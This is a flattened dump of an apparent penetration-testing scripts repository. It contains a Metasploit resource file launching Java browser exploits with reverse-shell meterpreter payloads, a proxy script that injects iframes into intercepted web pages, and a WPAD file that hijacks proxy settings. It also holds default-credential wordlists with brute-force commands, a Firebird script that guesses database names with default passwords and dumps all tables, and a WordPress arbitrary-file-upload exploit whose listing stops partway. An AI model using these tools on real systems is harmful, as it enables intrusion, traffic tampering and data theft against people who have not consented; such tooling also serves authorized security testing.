├── impacket ├── .gitignore ├── psexec.png ├── smbexec.png ├── wmiexec.png ├── README.md └── wmiexec.py ├── nessus └── README.md ├── as400 ├── vt5250.pyc ├── CodePage.pyc ├── Session.pyc ├── Screen5250.pyc ├── ScreenField.pyc ├── frmConnect.pyc ├── ScreenFields.pyc ├── tn5250.py ├── Sessions.py ├── SessionManager.py ├── Session.py ├── frmConnect.py ├── CodePage.py ├── testAS400.py ├── ScreenField.py ├── ScreenFields.py ├── tn5250.old.py └── Screen5250.py ├── masscan ├── README.MD └── parseMasscan.py ├── cenzic ├── screenshot1.png ├── README.md └── url2cenzic.py ├── mitm ├── wpad.dat ├── readme.txt ├── msf1.rc ├── iframe_injector ├── savecookies.js ├── pluginDetect4.htm └── beefclone.js ├── default_accounts_wordlist ├── README.md ├── wordList_ibm.txt ├── passwords.txt ├── users.txt ├── wordList_ssh_hydra.txt ├── getDefaultAccounts,py └── wordList_ssh.txt ├── README.md ├── vm_automation ├── README.md └── vmAcunetix.py ├── web ├── parseFileList.py └── parseFileList_linux.py ├── extractDominoUsers.py ├── enumeration └── findSubdomains.py ├── wireless └── sniffCert.py ├── wordpress_exploits ├── readme.txt └── cve-2013-3684.py ├── firebird └── firebirdBrute.py ├── ip2domains.py ├── exploits └── cve-2013-7331.html ├── plesk_panel └── pleskSQL.rb ├── others └── parseMSTports.py ├── niktohelper └── niktohelper.py ├── oracle_pillage ├── ora_priv.py └── ora_pillage.py └── emaildownloader └── emailDownloader.py /impacket/.gitignore: -------------------------------------------------------------------------------- 1 | .vscode/* -------------------------------------------------------------------------------- /nessus/README.md: -------------------------------------------------------------------------------- 1 | Migrated to https://github.com/milo2012/nmap2nessus 2 | -------------------------------------------------------------------------------- /as400/vt5250.pyc: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/milo2012/pentest_scripts/HEAD/as400/vt5250.pyc -------------------------------------------------------------------------------- /as400/CodePage.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/milo2012/pentest_scripts/HEAD/as400/CodePage.pyc -------------------------------------------------------------------------------- /as400/Session.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/milo2012/pentest_scripts/HEAD/as400/Session.pyc -------------------------------------------------------------------------------- /impacket/psexec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/milo2012/pentest_scripts/HEAD/impacket/psexec.png -------------------------------------------------------------------------------- /masscan/README.MD: -------------------------------------------------------------------------------- 1 | - parseMasscan.py 2 | Parse masscan output scan.xml into IP address list 3 | -------------------------------------------------------------------------------- /as400/Screen5250.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/milo2012/pentest_scripts/HEAD/as400/Screen5250.pyc -------------------------------------------------------------------------------- /as400/ScreenField.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/milo2012/pentest_scripts/HEAD/as400/ScreenField.pyc -------------------------------------------------------------------------------- /as400/frmConnect.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/milo2012/pentest_scripts/HEAD/as400/frmConnect.pyc 
-------------------------------------------------------------------------------- /impacket/smbexec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/milo2012/pentest_scripts/HEAD/impacket/smbexec.png -------------------------------------------------------------------------------- /impacket/wmiexec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/milo2012/pentest_scripts/HEAD/impacket/wmiexec.png -------------------------------------------------------------------------------- /as400/ScreenFields.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/milo2012/pentest_scripts/HEAD/as400/ScreenFields.pyc -------------------------------------------------------------------------------- /cenzic/screenshot1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/milo2012/pentest_scripts/HEAD/cenzic/screenshot1.png -------------------------------------------------------------------------------- /mitm/wpad.dat: -------------------------------------------------------------------------------- 1 | function FindProxyForURL(url, host) { 2 | // URLs within this network are accessed directly 3 | if (isInNet(host, "127.0.0.1", "255.255.255.0")) 4 | { 5 | return "DIRECT"; 6 | } 7 | return "PROXY 10.0.20.172:8080; DIRECT"; 8 | } 9 | 10 | -------------------------------------------------------------------------------- /cenzic/README.md: -------------------------------------------------------------------------------- 1 | # url2cenzic.py 2 | url2cenzic 3 | 4 | Cenzic Hailstorm Appscanner needs to accept proper URLs (final redirected URLs) 5 | This script parses the file containing the list of URLs and gets the final redirected URL and writes them into a CSV file that you can use to import into Cenzic Hailstorm Appscanner 6 
| 7 |  8 | -------------------------------------------------------------------------------- /mitm/readme.txt: -------------------------------------------------------------------------------- 1 | pip install pyopenssl 2 | pip install netlib 3 | pip install flask 4 | pip install termcolor 5 | 6 | or 7 | 8 | wget https://pypi.python.org/packages/source/t/termcolor/termcolor-1.1.0.tar.gz 9 | wget https://pypi.python.org/packages/source/p/pyOpenSSL/pyOpenSSL-0.13.1.tar.gz 10 | wget https://pypi.python.org/packages/source/n/netlib/netlib-0.9.2.tar.gz 11 | wget https://pypi.python.org/packages/source/F/Flask/Flask-0.10.1.tar.gz 12 | 13 | -------------------------------------------------------------------------------- /default_accounts_wordlist/README.md: -------------------------------------------------------------------------------- 1 | # Credits to: 2 | (1) cirt.net - For providing the extensive database of default credentials. 3 | 4 | # Below are examples of how you can use the generated wordlists 5 | ``` 6 | medusa -M ssh -C wordList_ssh.txt -H port22_hosts.txt 7 | medusa -M telnet -C wordList_telnet.txt -H port23_hosts.txt 8 | patator.py ssh_login host=10.0.0.1 user=FILE0 password=FILE1 0=users.txt 1=passwords.txt -x ignore:mesg='Authentication failed.' 9 | ``` 10 | 11 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | - ip2domains.py 2 | Extracts the common name from the SSL certificate (if it's not a wildcard domain). 3 | Performs a reverse lookup on Bing for domains hosted on the IP address. 4 | 5 | - firebird/firebird.py 6 | This tool attempts to brute force the database names on the Firebird database server using the default credentials (sysdba|masterkey). 7 | If you need an English dictionary wordlist, you can download one from http://www-01.sil.org/linguistics/wordlists/english/wordlist/wordsEn.txt. 
8 | 9 | - wireless/sniffCert.py 10 | Sniff and extract SSL certificate of wireless access point (EAP) 11 | 12 | 13 | -------------------------------------------------------------------------------- /as400/tn5250.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #Boa:App:BoaApp 3 | 4 | from wxPython.wx import * 5 | 6 | import frmConnect 7 | 8 | modules ={'frmConnect': [1, 'Main frame of Application', 'frmConnect.py']} 9 | 10 | class BoaApp(wxApp): 11 | def OnInit(self): 12 | wxInitAllImageHandlers() 13 | self.main = frmConnect.create(None) 14 | # needed when running from Boa under Windows 9X 15 | self.SetTopWindow(self.main) 16 | self.main.Show();self.main.Hide();self.main.Show() 17 | return True 18 | 19 | def main(): 20 | application = BoaApp(0) 21 | application.MainLoop() 22 | 23 | if __name__ == '__main__': 24 | main() 25 | -------------------------------------------------------------------------------- /vm_automation/README.md: -------------------------------------------------------------------------------- 1 | - vmAcunetix.py 2 | 3 | Starts up the VM (background optional with the -nogui parameter to improve performance) 4 | Launches Acunetix and scans the URLs listed in the text files. 
5 | ``` 6 | usage: vmAcunetix.py [-h] [-u USERNAME] [-p PASSWORD] [-iL FILENAME] [-nogui] 7 | [-n THREADS] 8 | 9 | optional arguments: 10 | -h, --help show this help message and exit 11 | -u USERNAME [username to use to login into VM] 12 | -p PASSWORD [password to use to login into VM] 13 | -iL FILENAME [text file containing list of URLs] 14 | -nogui [starts VM with no gui] 15 | -n THREADS [number of threads] 16 | ``` 17 | -------------------------------------------------------------------------------- /default_accounts_wordlist/wordList_ibm.txt: -------------------------------------------------------------------------------- 1 | :11111111:11111111 2 | :22222222:22222222 3 | :I5rDv2b2JjA8Mm:A52896nG93096a 4 | :QSECOFR:QSECOFR 5 | :QSRVBAS:QSRVBAS 6 | :QUSER:QUSER 7 | :admin:admin 8 | :admin:password 9 | :db2admin:db2admin 10 | :def:trade 11 | :guest:guest 12 | :ibm:2222 13 | :ibm:password 14 | :ibm:service 15 | :ncadmin:ncadmin 16 | :qpgmr:qpgmr 17 | :qsecofr:11111111 18 | :qsecofr:22222222 19 | :qsecofr:qsecofr 20 | :qserv:qserv 21 | :qsrv:qsrv 22 | :qsrvbas:qsrvbas 23 | :qsvr:ibmcel 24 | :qsvr:qsvr 25 | :qsysopr:qsysopr 26 | :root:ibm 27 | :secofr:secofr 28 | :storwatch:storwatch 29 | :vt100:public 30 | :webadmin:webibm 31 | :wpsadmin:wpsadmin 32 | :username:password 33 | -------------------------------------------------------------------------------- /web/parseFileList.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import argparse 3 | import sys 4 | 5 | if __name__ == '__main__': 6 | parser = argparse.ArgumentParser() 7 | 8 | parser.add_argument('-f', action='store', help='[file containing directory listing]') 9 | 10 | if len(sys.argv)==1: 11 | parser.print_help() 12 | sys.exit(1) 13 | 14 | options = parser.parse_args() 15 | if options.f: 16 | with open(options.f) as f: 17 | content = f.readlines() 18 | fullPath = '' 19 | for i in content: 20 | i = i.strip() 21 | if '/' in i: 22 | fullPath = 
i.replace(":","") 23 | elif "total " in i or len(i)<1: 24 | continue 25 | else: 26 | pathSplit = i.split(" ") 27 | try: 28 | if len(pathSplit)<12: 29 | print fullPath+"/"+pathSplit[10] 30 | except IndexError: 31 | continue 32 | -------------------------------------------------------------------------------- /as400/Sessions.py: --------------------------------------------------------------------------------
"""
SessionManager and Sessions objects
Created by Nathanael Custer 2002-07-01
"""
from Session import Session

__all__ = ["Sessions"]

# Tunable parameters
DEBUGLEVEL = 0
# Telnet Port
TELNET_PORT = 23

class Sessions:
    """Ordered registry of named Session objects.

    Entries live in self.list as two-element lists [name, Session].
    Names are not checked for uniqueness on insert, so name lookups
    return the first match.
    """
    def __init__(self):
        self.list = []

    def _addSession(self, name=''):
        """Create a fresh Session and append it to the registry under `name`."""
        session = [name, Session()]
        self.list.append(session)

    def _delSession(self, name=''):
        """Remove the entry (or entries) whose name equals `name`.

        NOTE(review): self.list is modified while it is being iterated,
        so the element right after a removed entry is skipped; with
        duplicate names some of them may survive. Harmless when names
        are unique. Unknown names are silently ignored.
        """
        for x in self.list:
            if name == x[0]:
                self.list.remove(x)
        #else:
        #raise error here

    def item(self, name=''):
        """Return the first Session registered under `name`, or None if absent."""
        for x in self.list:
            if name == x[0]:
                return x[1]

    def item_index(self, index=0):
        """Return the Session at position `index` (raises IndexError when out of range)."""
        return self.list[index][1]

    def _list(self):
        """Return the underlying [name, Session] list itself (not a copy)."""
        return self.list
-------------------------------------------------------------------------------- /extractDominoUsers.py: -------------------------------------------------------------------------------- 1 | from lxml import html 2 | import httplib 3 | from urlparse import urlparse 4 | import requests,sys 5 | 6 | url = "https://webmail.xxxx.com/certlog.nsf" 7 | 8 | 9 | page = requests.get(url,verify=False) 10 | if "Certificate Log" not in page.text: 11 | print "[!] 
Please check URL" 12 | else: 13 | #domainName = "carnivalaustralia.com" 14 | page = requests.get(url,verify=False) 15 | tree = html.fromstring(page.text) 16 | path = elements = tree.xpath('/html/body/ul/li[3]/a/@href') 17 | hostname = urlparse(url).hostname 18 | scheme = urlparse(url).scheme 19 | startUrl = scheme+"://"+hostname+path[0] 20 | 21 | nameList=[] 22 | count=1 23 | while True: 24 | url = startUrl+"&Start="+str(count)+"&ExpandView" 25 | #print url 26 | page = requests.get(url,verify=False) 27 | tree = html.fromstring(page.text) 28 | elements = tree.xpath('//tr/td//text()') 29 | if len(elements)>5: 30 | counter=0 31 | for i in elements: 32 | if counter%5==0: 33 | username = i.replace(", ",".") 34 | if username not in nameList: 35 | if "/" not in username and username!='Previous': 36 | nameList.append(username) 37 | print username 38 | #print username+"@"+domainName 39 | counter+=1 40 | elif len(elements)==0: 41 | sys.exit() 42 | count+=30 43 | -------------------------------------------------------------------------------- /as400/SessionManager.py: -------------------------------------------------------------------------------- 1 | """ 2 | SessionManager and Sessions objects 3 | Created by Nathanael Custer 2002-07-01 4 | """ 5 | from Sessions import Sessions 6 | 7 | __all__ = ["SessionManager"] 8 | 9 | # Tunable parameters 10 | DEBUGLEVEL = 0 11 | # Telnet Port TELNET_PORT = 23 12 | 13 | class SessionManager: 14 | def __init__(self): 15 | self.MasterSessionList = Sessions() 16 | 17 | def getSessions(self): 18 | return self.MasterSessionList 19 | 20 | def openSession(self, name=''): 21 | self.MasterSessionList._addSession(name) 22 | return self.MasterSessionList.item(name) 23 | 24 | def closeSession(self, name=''): 25 | session = self.MasterSessionList.item(name) 26 | self.MasterSessionList._delSession(name) 27 | 28 | def refresh(self): 29 | return self.MasterSessionList 30 | 31 | if __name__ == '__main__': 32 | test = SessionManager() 33 | print 
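"Generating 10 test sessions." 34 | for x in range(10): 35 | test.openSession('test' + str(x)) 36 | print "Here is the list of the sessions:" 37 | a = test.getSessions() 38 | print a.list 39 | print "Now removing the sessions one at a time" 40 | for x in range(10): 41 | test.closeSession('test' + str(x)) 42 | a = test.refresh() 43 | print "One less" 44 | print a.list 45 | -------------------------------------------------------------------------------- /masscan/parseMasscan.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# coding: utf-8
"""Split a masscan XML report into one host list per open port.

Usage: parseMasscan.py scan.xml
Writes <scan>-port<PORT>.list next to the input, one IP address per line.
"""

from __future__ import print_function
import os
import sys
from collections import defaultdict as ddict
try:
    # Preferred parser: defusedxml refuses entity expansion and external
    # entities, which matters when the report was produced on, or copied
    # from, a host you do not fully trust.
    from defusedxml.ElementTree import parse
except ImportError:
    print("defusedxml not found, downgrading to builtin XML parsing library.")
    from xml.etree.ElementTree import parse

# The original tested `sys.argv[1] is None`, which raises IndexError when
# no argument is given instead of printing this hint.
if len(sys.argv) < 2:
    raise SystemExit("need a file to convert")
if not os.path.exists(sys.argv[1]):
    raise SystemExit("File {} does not exist".format(sys.argv[1]))

# keep file name, to use for outputs
name = os.path.splitext(sys.argv[1])[0]

# parse file, extract hosts, map by open port found
et = parse(sys.argv[1])
portmap = ddict(list)
for xhost in et.findall('host'):
    # Look up <address addr=".."> and <ports><port portid=".."> by name.
    # The original used getchildren()[n].items()[1][1], which depends on
    # child order and on attribute ordering (and getchildren() no longer
    # exists in Python 3.9+). Hosts missing either element are skipped.
    address = xhost.find('address')
    port = xhost.find('ports/port')
    if address is None or port is None:
        continue
    hostaddr = address.get('addr')
    portid = port.get('portid')
    if hostaddr is None or portid is None:
        continue
    portmap[portid].append(hostaddr)

# dump to files corresponding to each port name
# .items() works on Python 2 and 3 (iteritems() was removed in 3);
# sorted() makes the output order deterministic.
for port, hosts in sorted(portmap.items()):
    outname = '{}-port{}.list'.format(name, port)
    with open(outname, 'w') as ofd:
        for host in hosts:
            ofd.write('{}\n'.format(host))
    print("wrote {}".format(outname))
-------------------------------------------------------------------------------- /impacket/README.md: 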
-------------------------------------------------------------------------------- 1 | Impacket Scripts Mod 2 | ============ 3 | Please see below for changes to wmiexec.py script 4 | Special thanks for Corelabs for making these scripts. 5 | Impacket scripts can be found here https://code.google.com/p/impacket/. 6 | 7 | The use case scenario for these modded scripts is that the password contains special characters like @ or : and you can't use it with the default wmiexec.py/psexec.py/smbexec.py scripts. 8 | 9 | These 3 scripts are the common tools to use if you want to get the remote host to execute a meterpreter exe file generated via Veil-Evasion. 10 | 11 |  12 | ``` 13 | python wmiexec.py -d testdomain -u user -p pass -ip 192.168.2.1 -command ipconfig 14 | or 15 | python wmiexec.py -d testdomain -u user -p pass -ip 192.168.2.1 -f ips.txt -command ipconfig 16 | ``` 17 | 18 |  19 | ``` 20 | python smbexec.py -d testdomain -u user -p pass -ip 192.168.2.1 21 | or 22 | python smbexec.py -d testdomain -u user -p pass -f ips.txt 23 | ``` 24 | 25 |  26 | ``` 27 | python psexec.py -d testdomain -u user -p pass -ip 192.168.2.1 -command ipconfig 28 | or 29 | python psexec.py -d testdomain -u user -p pass -f ips.txt -command ipconfig 30 | ``` 31 | -------------------------------------------------------------------------------- /mitm/msf1.rc: -------------------------------------------------------------------------------- 1 | setg exitonsession false 2 | setg LHOST 192.168.0.108 3 | setg SRVPORT 80 4 | setg SRVHOST 192.168.0.108 5 | sleep 3 6 | use exploit/multi/browser/java_jre17_jmxbean 7 | set PAYLOAD java/meterpreter/reverse_tcp 8 | set URIPATH /CVE-2013-0431 9 | set LPORT 4000 10 | exploit -jz 11 | sleep 2 12 | use exploit/multi/browser/java_atomicreferencearray 13 | set PAYLOAD java/meterpreter/reverse_tcp 14 | set URIPATH /CVE-2012-0507 15 | set LPORT 4001 16 | exploit -jz 17 | sleep 2 18 | use exploit/multi/browser/java_verifier_field_access 19 | set PAYLOAD 
java/meterpreter/reverse_tcp 20 | set URIPATH /CVE-2012-1723 21 | set LPORT 4002 22 | exploit -jz 23 | sleep 2 24 | use exploit/windows/browser/java_ws_vmargs 25 | set PAYLOAD windows/meterpreter/reverse_tcp 26 | set URIPATH /CVE-2012-0500 27 | set LPORT 81 28 | exploit -jz 29 | sleep 2 30 | use exploit/multi/browser/java_jre17_method_handle 31 | set PAYLOAD java/meterpreter/reverse_tcp 32 | set URIPATH /CVE-2012-5088 33 | set LPORT 4004 34 | exploit -jz 35 | sleep 2 36 | use exploit/windows/browser/java_cmm 37 | set PAYLOAD windows/meterpreter/reverse_tcp 38 | set URIPATH /CVE-2013-1493 39 | set LPORT 4005 40 | exploit -jz 41 | sleep 2 42 | use exploit/multi/browser/java_jre17_driver_manager 43 | set PAYLOAD java/meterpreter/reverse_tcp 44 | set URIPATH /CVE-2013-1488 45 | set LPORT 4006 46 | exploit -jz 47 | sleep 2 48 | use exploit/windows/browser/java_ws_double_quote 49 | set PAYLOAD windows/meterpreter/reverse_tcp 50 | set URIPATH / 51 | set LPORT 4007 52 | exploit -jz 53 | sleep 2 54 | use exploit/multi/browser/java_jre17_exec 55 | set PAYLOAD java/meterpreter/reverse_tcp 56 | set URIPATH /CVE-2012-4681 57 | set LPORT 82 58 | exploit -jz 59 | sleep 2 60 | -------------------------------------------------------------------------------- /as400/Session.py: -------------------------------------------------------------------------------- 1 | """ 2 | Session object 3 | Created by Kenneth J. 
Pouncey 2002-05-19 4 | """
from vt5250 import vt5250
from Screen5250 import Screen5250

__all__ = ["Session"]

# Tunable parameters
DEBUGLEVEL = 0
# Telnet Port
# NOTE(review): 993 is not the conventional telnet port (23); the sibling
# Sessions.py / SessionManager.py modules define TELNET_PORT = 23 -- confirm
# which default the target host actually listens on.
TELNET_PORT = 993

class Session:
    """Session interface class.

    Owns one vt5250 terminal (self.vt) and one Screen5250 buffer
    (self.screen), links the two to each other, and keeps the host/port
    that connect() will use.
    """
    def __init__(self,host=None,port=0):
        """Constructor.

        host -- target host name; 'localhost' when empty/None.
        port -- target port, parsed by setPort(); TELNET_PORT when falsy
                (so an explicit port of 0 also means "use TELNET_PORT").
        """
        self.debuglevel = DEBUGLEVEL
        self.vt = vt5250()
        self.vt.set_debuglevel(self.debuglevel)
        self.screen = Screen5250()
        self.screen.set_debuglevel(self.debuglevel)
        # Terminal and screen each hold a reference to the other.
        self.vt.setScreen(self.screen)
        self.screen.setVT(self.vt)
        if host:
            self.host = host
        else:
            self.host = 'localhost'
        if port:
            self.setPort(port)
        else:
            self.port = TELNET_PORT

    def set_debuglevel(self, debuglevel):
        """
        Set the debug level.
        The higher it is, the more debug output you get (on sys.stdout).
        The new level is pushed down to both the terminal and the screen.
        """
        self.debuglevel = debuglevel
        self.vt.set_debuglevel(self.debuglevel)
        self.screen.set_debuglevel(self.debuglevel)

    def connect(self):
        """Open the terminal connection to self.host:self.port."""
        self.vt.open(self.host,self.port)

    def disconnect(self):
        """Close the terminal connection."""
        self.vt.close()

    def setHost(self,host):
        """Replace the target host; used by the next connect()."""
        self.host = host

    def setPort(self,port):
        """Set the target port from an int or a numeric string.

        A value int() cannot parse is silently replaced by TELNET_PORT
        instead of raising, so a typo in the port is not reported.
        """
        try:
            self.port = int(port)
        except ValueError:
            self.port = TELNET_PORT

    def getScreen(self):
        """Return the Screen5250 buffer attached to this session."""
        return self.screen
-------------------------------------------------------------------------------- /mitm/iframe_injector: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Zap encoding in requests and inject iframe after body tag in html responses. 
4 | Usage: 5 | iframe_injector http://someurl/somefile.html 6 | """ 7 | from libmproxy import controller, proxy, platform 8 | import os 9 | import sys 10 | 11 | 12 | class InjectingMaster(controller.Master): 13 | def __init__(self, server, iframe_url): 14 | controller.Master.__init__(self, server) 15 | self._iframe_url = iframe_url 16 | 17 | def run(self): 18 | try: 19 | return controller.Master.run(self) 20 | except KeyboardInterrupt: 21 | self.shutdown() 22 | 23 | def handle_request(self, msg): 24 | if 'Accept-Encoding' in msg.headers: 25 | msg.headers["Accept-Encoding"][0] = 'none' 26 | msg.reply() 27 | 28 | def handle_response(self, msg): 29 | if msg.content: 30 | c = msg.replace('
', '' % self._iframe_url) 31 | if c > 0: 32 | print 'Iframe injected!' 33 | msg.reply() 34 | 35 | 36 | def main(argv): 37 | if len(argv) != 2: 38 | print "Usage: %s IFRAME_URL" % argv[0] 39 | sys.exit(1) 40 | iframe_url = argv[1] 41 | TRANSPARENT_SSL_PORTS = [443, 8443] 42 | trans = dict( 43 | resolver = platform.resolver(), 44 | sslports = TRANSPARENT_SSL_PORTS 45 | ) 46 | config = proxy.ProxyConfig( 47 | cacert = os.path.expanduser("~/.mitmproxy/mitmproxy-ca.pem") 48 | #transparent_proxy = trans 49 | 50 | ) 51 | server = proxy.ProxyServer(config, 8080) 52 | print 'Starting proxy...' 53 | m = InjectingMaster(server, iframe_url) 54 | m.run() 55 | 56 | if __name__ == '__main__': 57 | main(sys.argv) 58 | -------------------------------------------------------------------------------- /web/parseFileList_linux.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import sys 3 | import optparse 4 | 5 | ''' 6 | If you received a file/directory listing provided by the customer for a particular website, 7 | you can use the below script to convert it into something you can use inside burp intruder 8 | 9 | ├── CHANGELOG.txt 10 | ├── COPYRIGHT.txt 11 | ├── INSTALL.mysql.txt 12 | ├── INSTALL.pgsql.txt 13 | ├── INSTALL.sqlite.txt 14 | ├── INSTALL.txt 15 | ├── LICENSE.txt 16 | ├── MAINTAINERS.txt 17 | ├── README.txt 18 | ├── UPGRADE.txt 19 | ├── xxx 20 | │ ├── xxx.patch 21 | │ ├── yyy.patch 22 | ''' 23 | 24 | parser = optparse.OptionParser() 25 | parser.add_option('-f', action="store", dest="filename") 26 | options, remainder = parser.parse_args() 27 | 28 | if not options.filename: 29 | sys.exit() 30 | else: 31 | filename=options.filename 32 | text_file = open(filename, "r") 33 | lines = text_file.readlines() 34 | 35 | level1="├── " 36 | level2="│ ├── " 37 | level3="│ │ ├── " 38 | level4="│ │ │ ├── " 39 | lastLevel=0 40 | lastLevel1="" 41 | lastLevel2="" 42 | lastLevel3="" 43 | 44 | for x in lines: 45 | if 
x.startswith(level1): 46 | x=x.replace(level1,"") 47 | x=x.strip() 48 | print "/"+x 49 | lastLevel1="/"+x 50 | lastLevel=0 51 | if x.startswith(level2): 52 | x=x.replace(level2,"") 53 | x=x.strip() 54 | lastLevel2=x 55 | print lastLevel1+"/"+x 56 | lastLevel=1 57 | if x.startswith(level3): 58 | x=x.replace(level3,"") 59 | x=x.strip() 60 | if " ->" in x: 61 | x=x.split(" ->")[0] 62 | lastLevel3=x 63 | print lastLevel1+"/"+lastLevel2+"/"+x 64 | lastLevel=2 65 | if x.startswith(level4): 66 | x=x.replace(level4,"") 67 | x=x.strip() 68 | if " ->" in x: 69 | x=x.split(" ->")[0] 70 | lastLevel4=x 71 | print lastLevel1+"/"+lastLevel2+"/"+lastLevel3+"/"+x 72 | lastLevel=3 73 | 74 | -------------------------------------------------------------------------------- /enumeration/findSubdomains.py: -------------------------------------------------------------------------------- 1 | import optparse 2 | import sys 3 | import requests 4 | import json 5 | 6 | tmpDomainList=[] 7 | 8 | def lookup(domainName): 9 | nextLink='' 10 | url='https://transparencyreport.google.com/transparencyreport/api/v3/httpsreport/ct/certsearch?include_expired=true&include_subdomains=true&domain='+domainName 11 | content = requests.get(url) 12 | lines=(content.text).split("\n") 13 | contentStr="" 14 | for x in lines: 15 | x=x.strip() 16 | if x!=")]}'": 17 | contentStr+=x 18 | 19 | data = json.loads(contentStr) 20 | x=0 21 | while xAn appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.
') 35 | ****************************************************************************** 36 | -------------------------------------------------------------------------------------------------- 37 | 38 | 39 | -------------------------------------------------------------------------------------------------- 40 | [The below example shows that NextGEN Gallery is not found on host] 41 | 42 | python cve-2013-3684.py -i 127.0.0.1 -u /wordpress/wordpress1 43 | [*] Wordpress Plugin: NextGEN Gallery NOT found 44 | -------------------------------------------------------------------------------------------------- 45 | 46 | 47 | -------------------------------------------------------------------------------- /firebird/firebirdBrute.py: -------------------------------------------------------------------------------- 1 | try: 2 | import firebirdsql,sys 3 | except: 4 | print "Download pyfirebirdsql from https://github.com/nakagami/pyfirebirdsql.git" 5 | import argparse 6 | import sys 7 | 8 | def extractDB(database,ipAddr): 9 | con = firebirdsql.connect( 10 | host=ipAddr, database=database, 11 | user='sysdba', password='masterkey' 12 | ) 13 | cur = con.cursor() 14 | cur.execute("select rdb$relation_name from rdb$relations where rdb$view_blr is null and (rdb$system_flag is null or rdb$system_flag = 0);") 15 | results = cur.fetchall() 16 | print "\n- Found the below tables" 17 | for x in results: 18 | print x[0] 19 | 20 | for x in results: 21 | print "\n- Extracing the contents from the table: "+x[0] 22 | cur.execute("select * from "+x[0]+";") 23 | results = cur.fetchall() 24 | print results 25 | 26 | def connectFirebird(ipAddr,wordList): 27 | defaultDB="C:\\PROGRAM FILES\\FIREBIRD\\FIREBIRD_2_5\\EXAMPLES\\EMPBUILD\\EMPLOYEE.FDB" 28 | 29 | #Try getting list of connected databases without attempting any database name guess. 
30 | con = firebirdsql.services.connect(host=ipAddr, user='sysdba', password='masterkey') 31 | results = con.getAttachedDatabaseNames() 32 | dbList=[] 33 | if len(results)>0: 34 | for x in results: 35 | if x!=defaultDB: 36 | #Remove the default database 37 | dbList.append(x) 38 | print "\n- Found the below connected databases" 39 | for x in dbList: 40 | print x 41 | for x in dbList: 42 | print "\n- Extracting contents from Firebird database: "+x 43 | extractDB(x,ipAddr) 44 | else: 45 | #Brutefoorce firebird databasess 46 | print "\n- Bruteforcing Firebird database names" 47 | dictList=[] 48 | with open(wordList) as f: 49 | dictList = f.read().splitlines() 50 | currentWord="" 51 | for word in dictList: 52 | currentWord=word 53 | try: 54 | con = firebirdsql.connect( 55 | host=ipAddr, database=word, 56 | user='sysdba', password='masterkey' 57 | ) 58 | print "Correct database name: "+word 59 | break 60 | except firebirdsql.OperationalError: 61 | print "Incorrect database name: "+word 62 | continue 63 | extractDB(currentWord,ipAddr) 64 | 65 | if __name__ == '__main__': 66 | print "This tool attempts to brute force the database names on the Firebird database server using the default credentials (sysdba|masterkey)" 67 | parser = argparse.ArgumentParser() 68 | parser.add_argument('-host', dest='ipAddr', action='store', help='[IP address of Firebird database server]') 69 | parser.add_argument('-wordlist', dest='wordList', action='store', help='[File containing list of database names to brute force]') 70 | 71 | if len(sys.argv)==1: 72 | parser.print_help() 73 | sys.exit(1) 74 | options = parser.parse_args() 75 | if options.ipAddr: 76 | connectFirebird(options.ipAddr,options.wordList) 77 | -------------------------------------------------------------------------------- /wordpress_exploits/cve-2013-3684.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import httplib, mimetypes,urllib2 4 | 
5 | 6 | def exists(url): 7 | try: 8 | r = urllib2.urlopen(url) 9 | except urllib2.URLError as e: 10 | r = e 11 | return r.code == 200 12 | 13 | def post_multipart(host, uri, fields, files): 14 | content_type, body = encode_multipart_formdata(fields, files) 15 | h = httplib.HTTPConnection(host) 16 | headers = { 17 | 'User-Agent': 'INSERT USERAGENTNAME', 18 | 'Content-Type': content_type 19 | } 20 | h.request('POST', uri, body, headers) 21 | res = h.getresponse() 22 | return res.status, res.reason, res.read() 23 | 24 | def encode_multipart_formdata(fields, files): 25 | """ 26 | fields is a sequence of (name, value) elements for regular form fields. 27 | files is a sequence of (name, filename, value) elements for data to be uploaded as files 28 | Return (content_type, body) ready for httplib.HTTP instance 29 | """ 30 | BOUNDARY = '----------bound@ry_$' 31 | CRLF = '\r\n' 32 | L = [] 33 | for (key, value) in fields: 34 | L.append('--' + BOUNDARY) 35 | L.append('Content-Disposition: form-data; name="%s"' % key) 36 | L.append('') 37 | L.append(value) 38 | for (key, filename, value) in files: 39 | L.append('--' + BOUNDARY) 40 | L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename)) 41 | L.append('Content-Type: image/gif') 42 | L.append('') 43 | L.append(value) 44 | L.append('--' + BOUNDARY + '--') 45 | L.append('') 46 | body = CRLF.join(L) 47 | content_type = 'multipart/form-data; boundary=%s' % BOUNDARY 48 | return content_type, body 49 | 50 | 51 | if __name__ == '__main__': 52 | import argparse 53 | parser = argparse.ArgumentParser(__file__) 54 | parser = argparse.ArgumentParser(description="NextGEN Gallery 1.9.12 Arbitrary File Upload (CVE-2013-3684)") 55 | parser.add_argument('-i','--ip', help='IP address or host name', required=True) 56 | parser.add_argument('-u','--uri', help='URI path /wordpress', required=True) 57 | parser.add_argument('-f','--file', help='File to upload', required=True) 58 | args = vars(parser.parse_args()) 59 | 60 
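# cve-2013-3684.py, remainder of the __main__ block: plugin check, upload, result URL.
    # argparse enforces required=True, so both keys are always present; the
    # guard is kept for anyone who builds ``args`` by hand.
    if args['ip'] is not None and args['uri'] is not None:
        uriPath = 'http://'+args['ip']+args['uri']+'/wp-content/plugins/nextgen-gallery/'
        # A 200 for the plugin directory only shows NextGEN is installed; it
        # says nothing about the version, so the upload is attempted anyway.
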